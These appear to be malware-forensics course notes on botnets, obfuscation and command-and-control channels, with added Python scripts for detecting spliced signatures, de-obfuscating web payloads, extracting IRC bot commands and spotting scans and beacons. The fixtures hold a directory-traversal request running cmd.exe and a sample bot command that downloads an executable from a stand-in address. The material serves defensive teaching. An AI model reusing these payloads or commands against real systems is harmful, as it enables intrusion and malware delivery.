3.3 Malware Analysis

Week 3 Day 3 - Malware Analysis & Attack Analysis


Malware Forensics

As computers have become increasingly networked, so too has malware.


Goals:

  • Understanding malware and associated vulnerabilities in order to produce antivirus/IDS signatures
  • Detecting compromised systems on the network
  • Determining the scope of a breach, after the fact
  • Containing an infection
  • Tracking down the source of malware
  • Gathering evidence for court

Trends in Malware Evolution

Early malware spread via floppy disks: boot-sector viruses infected the MBR when a machine booted from an infected disk, and file infectors travelled in copied programs such as freeware utilities.

USB drives/physical devices are still a notable source of malware.


The vast majority of malware activity now occurs over the network:

  • Even malware injected via a physical storage medium
  • Communicates over the network after infecting a new host


Malware has become more dependent on the network for:

  • Propagation
  • Control
  • Payload functionality


This is why network forensics and malware analysis overlap so heavily.


Botnet

The modern botnet is the convergence of:

  • Advancements in remote control
  • Automated propagation
  • Hierarchical and distributed management techniques


The evolution of botnets has been shaped by:

  • The development of IDS
  • Which drove botnets to incorporate sophisticated IDS evasion and other sophisticated features


Botnets are valuable commodities, rented and sold through underground black markets for:

  • Distributing spam
  • Coordinating DDoS attacks
  • Stealing financial information


Remote Access Trojans (RATs)

Remote Access Trojans (RATs) facilitate remote control of individual compromised endpoints.


Implications for Network Forensics

The most publicised aspect of malware analysis is reverse-engineering:

  • Focused on the behaviour of samples caught "in the wild"
  • To understand the nature and mechanisms of compromise
  • To develop antivirus/IDS signatures for detecting the malware

For the forensic investigator this usually begins by:

  • Identifying a known-to-be-compromised host
  • Extracting the malicious code from that system (memory/disk)


Challenge:

  • Malware authors obfuscate and hide their code

Encryption and Obfuscation

Malware authors use encryption to:

  • Hide functionality
  • Create random-appearing payloads
  • Make detection difficult for antivirus, IDS and forensic investigators
  • Combined with sophisticated techniques to obscure the decryptor and keys


Encrypted malware dates from the late 1980s

  • Example: the "Cascade" virus (1987)
  • Encrypted its body, leaving only a small decryptor in the clear, to avoid detection by antivirus
  • Visible payload: all the letters on the screen dropped to the bottom


Forensic investigators therefore:

  • Turn to statistical flow analysis
  • Rather than content-based analysis
  • To efficiently detect and dissect malware that hides its content

Early IDS/Antivirus Evasion

Session splicing:

  • Chops up a string from a session and splits it across multiple packets
  • To foil NIDS/NIPS pattern matching: no single packet contains the whole string
  • The NIDS/NIPS must reassemble the TCP session before it can detect the string
  • Resource intensive for the NIDS/NIPS


Fragmentation:

  • Splits individual IP packets into smaller fragments
  • The NIDS/NIPS must reassemble the fragments before it can analyse the packet
  • Resource intensive for the NIDS/NIPS
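The following Python script is an added example, not code from the original notes. It models session splicing and shows why a NIDS must reassemble before matching: a signature chopped across 4-byte TCP segments is invisible to per-packet matching but found once the stream is rebuilt, even when segments arrive out of order, duplicated or overlapping. The HTTP request, the signature string and the segment sizes are constructed for illustration; IP fragment reassembly follows the same offset-ordered logic.

```python
"""Session splicing vs. stream reassembly.

Added example, not from the original notes. The HTTP request and the
signature string are constructed for illustration; the reassembler is a
minimal model of what a NIDS has to do before pattern matching, not a
production TCP stack.
"""
from dataclasses import dataclass

# Constructed: a directory-traversal request carrying a shell invocation.
REQUEST = b"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n"
SIGNATURE = b"cmd.exe?/c"   # what a content signature would look for


@dataclass(frozen=True)
class Segment:
    """One TCP segment: relative sequence number plus payload bytes."""
    seq: int
    payload: bytes


def splice(payload: bytes, chunk: int) -> list[Segment]:
    """Session splicing: chop one application-layer string across many segments."""
    return [Segment(i, payload[i:i + chunk]) for i in range(0, len(payload), chunk)]


def naive_match(segments: list[Segment], sig: bytes = SIGNATURE) -> bool:
    """Per-packet matching: looks at each segment in isolation."""
    return any(sig in s.payload for s in segments)


def reassemble(segments: list[Segment]) -> bytes:
    """Rebuild the byte stream from segments delivered in any order.

    Retransmissions (fully covered ranges) are dropped and partial overlaps are
    trimmed, so a duplicate or overlapping segment cannot inject extra bytes.
    Holes are not waited for: missing data is simply skipped.
    """
    stream = bytearray()
    expected = 0
    for s in sorted(segments, key=lambda s: s.seq):
        end = s.seq + len(s.payload)
        if end <= expected:
            continue                                       # pure retransmission
        stream += s.payload[max(0, expected - s.seq):]     # trim overlapping prefix
        expected = end
    return bytes(stream)


def reassembling_match(segments: list[Segment], sig: bytes = SIGNATURE) -> bool:
    """Stream-aware matching: reassemble first, then search."""
    return sig in reassemble(segments)


if __name__ == "__main__":
    spliced = splice(REQUEST, 4)        # no 4-byte slice can hold the 10-byte signature
    print("per-packet match:", naive_match(spliced))            # False
    print("reassembled match:", reassembling_match(spliced))    # True
    print("out of order:", reassembling_match(list(reversed(spliced))))
```

The cost the notes mention is visible in the code: the reassembler has to sort and buffer every segment of every session before a single comparison can be made, which is exactly the resource pressure splicing and fragmentation exploit.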

Modern Web Obfuscation/Encryption

Modern malware is often web-based

  • Obfuscation techniques are used to embed malicious code in web pages
    • Typically as JavaScript
  • Takes the form of Base64 encoding, XOR-ing and more complex schemes to evade web filters and NIDS/NIPS
  • Web filters and NIDS/NIPS are often unable to properly de-obfuscate on the fly
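As an added example (not from the original notes), the Python script below peels the Base64 and single-byte XOR layers just described off a captured web payload until readable script appears. The obfuscated sample, the XOR key and the plaintext markers it looks for are constructed assumptions; multi-byte keys and real JavaScript packers need more than this (frequency analysis, or running the script in a sandboxed interpreter).

```python
"""Peeling layered Base64 / single-byte-XOR obfuscation from a web payload.

Added example, not from the original notes. The obfuscated script, the XOR
key and the plaintext markers are constructed for illustration.
"""
import base64
import binascii
import re

MAX_LAYERS = 6
# Tokens that tell us we have reached readable script. Assumption: these are
# typical of the payloads the notes describe; extend for your environment.
MARKERS = (b"eval(", b"document.write", b"unescape(", b"ActiveXObject", b"<script")
B64_RE = re.compile(rb"^[A-Za-z0-9+/=\s]+$")


def looks_decoded(data: bytes) -> bool:
    return any(m in data for m in MARKERS)


def xor_bytes(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def try_base64(data: bytes):
    """Decode if the whole blob is Base64 alphabet; None otherwise."""
    if len(data) < 8 or not B64_RE.match(data):
        return None
    try:
        return base64.b64decode(re.sub(rb"\s", b"", data))
    except (binascii.Error, ValueError):
        return None


def deobfuscate(data: bytes, depth: int = 0, allow_xor: bool = True):
    """Return [(layer, bytes), ...] ending in readable script, or None.

    Base64 is tried first when the alphabet fits; otherwise every single-byte
    XOR key is tried. Two XOR layers in a row collapse to one key, so after an
    XOR layer only Base64 is attempted next, which keeps the search bounded.
    """
    if looks_decoded(data):
        return [("plain", data)]
    if depth >= MAX_LAYERS:
        return None
    decoded = try_base64(data)
    if decoded is not None:
        inner = deobfuscate(decoded, depth + 1, allow_xor=True)
        if inner:
            return [("base64", data)] + inner
    if allow_xor:
        for key in range(1, 256):
            inner = deobfuscate(xor_bytes(data, key), depth + 1, allow_xor=False)
            if inner:
                return [(f"xor:{key:#04x}", data)] + inner
    return None


# Attacker side, used only to build the constructed samples.
PLAIN = b'eval(unescape("%61%6c%65%72%74%28%31%29"));'
SAMPLE = base64.b64encode(xor_bytes(PLAIN, 0x5A))              # base64(xor(script))
SAMPLE_DOUBLE = base64.b64encode(base64.b64encode(PLAIN))      # base64(base64(script))

if __name__ == "__main__":
    for layer, blob in deobfuscate(SAMPLE) or []:
        print(f"{layer:>9}: {blob[:48]!r}")
```

The marker test is the weak point a practitioner should tune: an inline filter on a proxy has microseconds per object, which is why the notes say such systems often cannot de-obfuscate on the fly, whereas an offline investigator can afford the 255-key search per layer.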

Hiding C&C Channels

Modern malware incorporates obfuscation and encryption:

  • To disguise the injection vectors and payloads
  • To hide the content of the C&C channel

This allows botnets to evade detection and analysis based on packet-content inspection.

Distributed Command-and-Control Systems

  • Maintaining control of zombies is challenging but important
  • Today attackers have such effective control over their networks that they can:
    • Segment and sell botnets through underground black markets
    • Easily transfer control to third parties
  • C&C has evolved from simple, direct connections to central servers (IRC)
  • To highly complex, distributed, redundant multi-layer systems with built-in security features

The Early Days: Internet Relay Chat (IRC)

Early botnets relied upon centralised control systems where zombies communicated directly with central servers.

A very common mechanism for malware C&C was Internet Relay Chat (IRC):

  • Malware was hard-coded with:
    • Server IP addresses or domain names
    • IRC channel information
  • This allowed zombies to connect back to the C&C centre:
    • To drop off information about the infected system
    • Or to receive commands and updates
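The exchange described above, reconstructed as an added example that is not part of the original notes: a constructed capture of a zombie logging in to an IRC server, joining a hard-coded channel and receiving commands, with a small Python extractor that pulls the C&C indicators (server, bot-style nick, channel and key, commands received, download URL) out of the stream. Because it keys on IRC command grammar rather than on TCP port 6667, it still works when the bot uses a non-standard port. The server name, channel, nick format and the ".scan"/".download" commands are illustrative assumptions modelled on classic IRC bots, not a real sample.

```python
"""Reconstructing an IRC-based C&C session from a captured TCP stream.

Added example, not from the original notes. The captured lines are
constructed: server name, channel, nick format and dot-commands are
illustrative assumptions, not a real sample.
"""
import re

# (direction, line): ">" is zombie -> server, "<" is server -> zombie.
CAPTURE = [
    (">", "NICK [USA|XP]-83421"),                        # nick leaks country/OS
    (">", "USER xp 0 0 :xp"),
    ("<", ":irc.example.test 001 [USA|XP]-83421 :Welcome"),
    (">", "JOIN #bots secretkey"),                        # hard-coded channel + key
    ("<", ":[USA|XP]-83421!xp@10.0.0.20 JOIN :#bots"),
    ("<", ":master!op@198.51.100.7 PRIVMSG #bots :.scan 10.0.0.0/8 135"),
    ("<", ":master!op@198.51.100.7 PRIVMSG #bots :.download http://198.51.100.7/update.exe"),
    (">", "PRIVMSG #bots :scanning 10.0.0.0/8"),         # zombie reports back
]

# A human chatting on the same server, for comparison.
BENIGN = [
    (">", "NICK alice"),
    (">", "USER alice 0 * :Alice"),
    ("<", ":irc.example.test 001 alice :Welcome"),
    (">", "JOIN #linux"),
    ("<", ":bob!b@192.0.2.4 PRIVMSG #linux :anyone tried the new kernel?"),
]

NICK_RE = re.compile(r"^NICK\s+(\S+)")
JOIN_RE = re.compile(r"^JOIN\s+(#\S+)(?:\s+(\S+))?")
WELCOME_RE = re.compile(r"^:(\S+)\s+001\s")
PRIVMSG_RE = re.compile(r"^:(\S+?)!\S+\s+PRIVMSG\s+(#\S+)\s+:(.*)$")
URL_RE = re.compile(r"https?://\S+")


def extract_c2_indicators(capture):
    """Pull server, nick, channel/key and received bot commands out of the stream."""
    ind = {"server": None, "nick": None, "channels": [], "keys": {}, "commands": []}
    for direction, line in capture:
        if direction == ">":
            if m := NICK_RE.match(line):
                ind["nick"] = m.group(1)
            elif m := JOIN_RE.match(line):
                ind["channels"].append(m.group(1))
                if m.group(2):
                    ind["keys"][m.group(1)] = m.group(2)
        else:
            if m := WELCOME_RE.match(line):
                ind["server"] = m.group(1)
            elif (m := PRIVMSG_RE.match(line)) and m.group(3).startswith("."):
                ind["commands"].append((m.group(1), m.group(2), m.group(3)))
    return ind


def is_irc_c2(capture):
    """Heuristic: IRC login, a channel join, and at least one dot-command from the channel."""
    ind = extract_c2_indicators(capture)
    return bool(ind["nick"] and ind["channels"] and ind["commands"])


def update_urls(ind):
    """Download URLs handed to the zombie: the next thing the investigator should chase."""
    return [u for _, _, text in ind["commands"] for u in URL_RE.findall(text)]


if __name__ == "__main__":
    found = extract_c2_indicators(CAPTURE)
    print(found)
    print("bot:", is_irc_c2(CAPTURE), "human:", is_irc_c2(BENIGN))
    print("fetch next:", update_urls(found))
```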

Evolution Toward Distributed C&C

  • Newer botnets are moving toward partially distributed C&C architectures rather than fully centralised ones
  • Zombies do not connect directly back to a central server
  • Zombies connect to servers in a redundant, distributed network
  • Arranged as a multilevel hierarchy
  • Systems at each level communicate with each other
  • At least some systems in each level can communicate with systems in the level above

Updates originate from a small number of C&C servers:

  • And fan out down the hierarchy to a very large number of zombies
  • Zombies can pass information back up the chain
  • Far greater redundancy
  • Lower risk of detection/disruption

Peer-to-Peer C&C

  • Took distributed C&C to new extremes using P2P protocols
  • At the beginning of an infection:
    • The zombie attempts to link up with other zombies via P2P networking, so there is no central server to take down

Metamorphic Network Behaviour

Early malware had relatively static network behaviour

  • Using specific, fixed ports/protocols
  • Which network analysts used to develop antivirus/IDS signatures


Static behaviour examples:

  • W32/Blaster could be detected by searching for unexpected traffic on TCP 135, TCP 4444 and/or UDP 69
  • W32/Witty could be found by alerting on UDP source port 4000

BackOrifice and Sub7:

  • Allowed the attacker to customise ports/payloads for each individual zombie
  • But frequently these daemons were installed on their default ports, UDP 31337 (BackOrifice) and TCP 27374 (Sub7)


Malware with static network behaviour can easily be blocked using firewall rules/router ACLs.

Evading solution:

  • Dynamic network behaviour:
    • Multiple propagation strategies
    • Variable daemon ports
    • Sophisticated scanning algorithms
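The Python script below is an added example, not code from the original notes. It turns the static Blaster and Witty behaviours listed above into flow-level signatures and then shows what the "variable daemon ports" evasion does to them: a variant that randomises its shell port slips past the three-stage Blaster correlation, while a signature written only on the stages that cannot change (the exploit port and the TFTP fetch direction) still catches both. The flow records, hosts and the variant's port are constructed; the port numbers for Blaster and Witty are the ones the notes give.

```python
"""Static network-behaviour signatures, and how variable ports defeat them.

Added example, not from the original notes. Flow records are constructed;
the ports are those the notes give for Blaster (TCP/135, TCP/4444, UDP/69)
and Witty (UDP source port 4000).
"""
from collections import defaultdict
from typing import NamedTuple


class Flow(NamedTuple):
    src: str
    dst: str
    proto: str    # "tcp" or "udp"
    sport: int
    dport: int


FLOWS = [
    # Blaster-style infection: 10.0.0.5 compromises 10.0.0.20
    Flow("10.0.0.5", "10.0.0.20", "tcp", 1037, 135),     # RPC DCOM exploit
    Flow("10.0.0.5", "10.0.0.20", "tcp", 1038, 4444),    # attacker connects to the shell
    Flow("10.0.0.20", "10.0.0.5", "udp", 1025, 69),      # victim TFTPs the worm body
    # Variant with a randomised shell port: same exploit, same TFTP fetch
    Flow("10.0.0.6", "10.0.0.21", "tcp", 1040, 135),
    Flow("10.0.0.6", "10.0.0.21", "tcp", 1041, 27815),
    Flow("10.0.0.21", "10.0.0.6", "udp", 1025, 69),
    # Witty-style probe, and an ordinary DNS query for contrast
    Flow("192.0.2.9", "10.0.0.40", "udp", 4000, 31218),
    Flow("10.0.0.40", "10.0.0.1", "udp", 51234, 53),
]


def witty_hits(flows):
    """Witty announced itself with a fixed UDP source port of 4000."""
    return [f for f in flows if f.proto == "udp" and f.sport == 4000]


def blaster_stages(flows, shell_port=4444):
    """Which Blaster stages have been seen for each (attacker, victim) pair."""
    stages = defaultdict(set)
    for f in flows:
        if f.proto == "tcp" and f.dport == 135:
            stages[(f.src, f.dst)].add("exploit")
        elif f.proto == "tcp" and f.dport == shell_port:
            stages[(f.src, f.dst)].add("shell")
        elif f.proto == "udp" and f.dport == 69:
            stages[(f.dst, f.src)].add("tftp")     # reversed: the victim pulls from the attacker
    return stages


def blaster_pairs(flows):
    """Static signature: all three stages, including the fixed shell port 4444."""
    return sorted(p for p, seen in blaster_stages(flows).items()
                  if seen == {"exploit", "shell", "tftp"})


def port_agnostic_blaster(flows):
    """Signature on the stages the attacker cannot vary: exploit port plus TFTP fetch direction."""
    return sorted(p for p, seen in blaster_stages(flows).items()
                  if seen >= {"exploit", "tftp"})


if __name__ == "__main__":
    print("witty:", [f.src for f in witty_hits(FLOWS)])
    print("blaster (fixed port):", blaster_pairs(FLOWS))        # misses the variant
    print("blaster (port-agnostic):", port_agnostic_blaster(FLOWS))
```

The router-ACL equivalent has the same weakness: "deny tcp any any eq 4444" stops the original worm and nothing else, while a rule on TCP/135 from untrusted sources blocks the stage the variant still needs.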

Multiple Propagation Strategies

Zombies can include multiple methods for exploiting new systems, which also helps them fool:

  • Simple port-blocking
  • Simple router ACLs
  • IDS rules


Nimda (2001) spread very quickly due to multiple propagation strategies:

  • Infection of vulnerable IIS web servers
  • Bulk emails
  • Scanning for back doors left by other worms
  • Open network shares

This created a variety of patterns on the network:

  • HTTP traffic
  • SMTP traffic
  • File sharing traffic

Variable Daemon Ports

Port-blocking

  • One of the simplest and oldest methods of stopping malware

Much malware therefore dynamically changes its C&C and malware-distribution ports to evade this blocking.


Network Behaviour of Malware

Bad news for defender:

  • The authors of today’s malware are sophisticated in their strategies

Good news for defender:

  • Sooner or later the malicious agent will create or modify network traffic


A network containing zombies shows a different traffic pattern from the same network without them.

However, malware authors are improving their techniques for blending with normal traffic and piggybacking on common activities (web surfing).


Propagation

Some of the most common propagation techniques:

  • Email
  • Web links and content
  • Network shares
  • Direct network-based exploitation


Investigators search for signatures of the malware in:

  • Packet payload content
  • Sizes of transferred data
  • Statistical flow analysis of ports and targeted addresses

Evidence of malware propagation is often filtered, and therefore logged, by web proxies and email proxies.


Command-and-Control Communications

C&C channels allow remote attackers to manage and update zombies remotely.

This is a double-edged sword: the channel gives the malware developer control, but it also gives the network forensic investigator something to find.

Common vectors for C&C channel:

  • HTTP
  • Social networking sites
  • Peer-to-peer
  • IRC
  • Cloud computing environments


Modern malware C&C channels are integrated into:

  • Web traffic
  • Social networking sites
  • And other less obvious traffic

C&C channels are also designed to operate using multiple strategies in case one is cut off, e.g. receiving updates through distributed networks.


Forensic Guide

Detect and analyse C&C traffic by statistical flow analysis, noting changes in volume, directionality, sources and destinations, and timing of flow patterns.

If the traffic is not encrypted, or there are specific markers in packet contents and headers:

  • Content-based alerting mechanisms may also be deployed
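As an added example (not from the original notes), the following Python script applies the statistical flow analysis described here, and in the Propagation section above, to constructed flow records: a fan-out check over sources and destinations that spots a host probing many neighbours on one port (propagation), and a timing check that spots a host contacting one external address at near-constant intervals (C&C beaconing). Neither looks at payload, so both still work when the channel is encrypted. The hosts, addresses, window sizes and thresholds are assumptions chosen for illustration and must be tuned to a real network's baseline.

```python
"""Statistical flow analysis: propagation scans and C&C beaconing.

Added example, not from the original notes. All flow records are constructed
(one worm-like scanner that also beacons, and one host browsing normally);
window sizes and thresholds are illustrative assumptions to tune per network.
"""
from collections import defaultdict
from statistics import mean, pstdev
from typing import NamedTuple


class Flow(NamedTuple):
    ts: float      # flow start time, seconds
    src: str
    dst: str
    proto: str
    dport: int


def build_sample():
    flows = []
    # Propagation: 10.0.0.20 probes TCP/445 on 40 neighbours within 20 seconds.
    for i in range(40):
        flows.append(Flow(100 + i * 0.5, "10.0.0.20", f"10.0.1.{i + 1}", "tcp", 445))
    # C&C: the same host contacts one external address every ~300 s (+-2 s jitter).
    for k in range(8):
        jitter = 2 if k % 2 == 0 else -2
        flows.append(Flow(1000 + k * 300 + jitter, "10.0.0.20", "203.0.113.5", "tcp", 443))
    # Ordinary browsing: bursty, irregular timing, a handful of destinations.
    browsing = [(1010, "198.51.100.1"), (1017, "198.51.100.1"), (1150, "198.51.100.2"),
                (1600, "198.51.100.1"), (1640, "198.51.100.3"), (2900, "198.51.100.1"),
                (2905, "198.51.100.1"), (3100, "198.51.100.1")]
    for ts, dst in browsing:
        flows.append(Flow(ts, "10.0.0.31", dst, "tcp", 443))
    return flows


def detect_scanners(flows, window=60.0, min_targets=16):
    """Fan-out: one source reaching many distinct destinations on one port within a window."""
    by_key = defaultdict(list)
    for f in flows:
        by_key[(f.src, f.proto, f.dport)].append(f)
    hits = []
    for (src, proto, dport), fs in by_key.items():
        fs.sort(key=lambda f: f.ts)
        best, j = 0, 0
        for i in range(len(fs)):                # sliding window over start times
            while fs[i].ts - fs[j].ts > window:
                j += 1
            best = max(best, len({f.dst for f in fs[j:i + 1]}))
        if best >= min_targets:
            hits.append((src, proto, dport, best))
    return hits


def detect_beacons(flows, min_flows=6, max_cv=0.1):
    """Periodicity: near-constant gaps between flows to the same destination and port.

    cv = stdev(gaps) / mean(gaps): a human browsing gives cv well above 1, a timer gives cv near 0.
    """
    by_key = defaultdict(list)
    for f in flows:
        by_key[(f.src, f.dst, f.dport)].append(f.ts)
    hits = []
    for (src, dst, dport), times in by_key.items():
        if len(times) < min_flows:
            continue
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        cv = pstdev(gaps) / avg if avg > 0 else float("inf")
        if cv <= max_cv:
            hits.append((src, dst, dport, round(avg, 1), round(cv, 3)))
    return hits


def suspicious_hosts(flows):
    """Sources flagged by either analysis: candidates for host-based triage."""
    return sorted({h[0] for h in detect_scanners(flows)} | {h[0] for h in detect_beacons(flows)})


if __name__ == "__main__":
    sample = build_sample()
    print("scanners:", detect_scanners(sample))
    print("beacons:", detect_beacons(sample))
    print("triage:", suspicious_hosts(sample))
```

The two checks correspond to the notes' "sources and destinations" and "timing" dimensions; volume and directionality can be added the same way (bytes per flow, and the ratio of outbound to inbound bytes per pair) once the records carry byte counts. Malware that randomises its beacon interval, as the notes warn, pushes cv up and needs a longer observation window or a different periodicity test.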

Payload Behaviour

Payload behaviour depends on:

  • The malware author's intent
  • The environment

Typically, zombie behaviour includes:

  • Spam
  • DoS
  • Pirated software hosting
  • Confidential information theft (spyware)
  • Scanning for reconnaissance
  • Keylogging


Forensic Guide

Each payload generates a different pattern of network traffic. Some are designed for stealthy, long-term infiltration and may lie dormant on the network for months or years until activated.